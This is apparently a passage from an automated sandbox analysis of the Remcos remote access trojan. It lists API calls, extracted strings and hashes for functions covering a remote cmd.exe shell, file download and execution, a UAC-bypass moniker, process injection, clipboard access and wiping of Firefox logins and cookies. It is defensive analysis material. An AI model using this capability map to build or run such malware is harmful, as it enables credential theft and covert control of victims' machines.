                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                          Function 004186B4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DisposeGdipImage
                                          • String ID:
                                          • API String ID: 1024088383-0
                                          • Opcode ID: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                                          • Instruction ID: d9118485f6a3d23189d012adfd41c145ee3959ede018d2d91b25300b670f9ca3
                                          • Opcode Fuzzy Hash: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                                          • Instruction Fuzzy Hash: E1A001B4815601DF8F025F609A48A647FA5AB4630A3248199D4898A222D77BC857DE6A
                                          Function 00411CDE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                          Non-executed Functions

                                          Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C37D
                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C3AD
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C402
                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C463
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C46A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                          • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                          • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                          • API String ID: 1067849700-181434739
                                          • Opcode ID: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                                          • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                          • Opcode Fuzzy Hash: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                                          • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                          Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                          • PeekNamedPipe.KERNEL32 ref: 004058BC
                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                          • CloseHandle.KERNEL32 ref: 00405A23
                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                          • CloseHandle.KERNEL32 ref: 00405A45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                          • API String ID: 2994406822-18413064
                                          • Opcode ID: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                                          • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                          • Opcode Fuzzy Hash: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                                          • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                          Function 00412132 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                          • OpenMutexA.KERNEL32 ref: 00412181
                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`.p$fsutil.exe$rmclient.exe$svchost.exe
                                          • API String ID: 3018269243-1689298428
                                          • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                          • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                          • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                          • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                          Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 1164774033-3681987949
                                          • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                          • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                          Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenClipboard.USER32 ref: 004168FD
                                          • EmptyClipboard.USER32 ref: 0041690B
                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                          • CloseClipboard.USER32 ref: 00416990
                                          • OpenClipboard.USER32 ref: 00416997
                                          • GetClipboardData.USER32 ref: 004169A7
                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                          • CloseClipboard.USER32 ref: 004169BF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                          • String ID: !D@
                                          • API String ID: 3520204547-604454484
                                          • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                          • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                          • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                          • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                          Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Close$File$FirstNext
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 3527384056-432212279
                                          • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                          • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                          Function 0040F4AF Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 210processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                          • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$`.p$ieinstal.exe$ielowutil.exe
                                          • API String ID: 3756808967-2797908973
                                          • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                          • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                          • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                          • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                          Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                          • String ID:
                                          • API String ID: 297527592-0
                                          • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                          • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                          • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                          • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                          Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                          • API String ID: 0-1861860590
                                          • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                          • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                          • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                          • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                          Function 0041C322 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C37D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C3AD
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C41F
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C42C
                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C402
                                          • GetLastError.KERNEL32(?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C44D
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C463
                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C46A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,`.p,004752F0,00000001), ref: 0041C473
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID: `.p
                                          • API String ID: 2341273852-3969149474
                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                          Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040755C
                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Object_wcslen
                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                          • API String ID: 240030777-3166923314
                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                          Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                          • GetLastError.KERNEL32 ref: 0041A84C
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                          • String ID:
                                          • API String ID: 3587775597-0
                                          • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                          • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                          Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID: JD$JD$JD
                                          • API String ID: 745075371-3517165026
                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
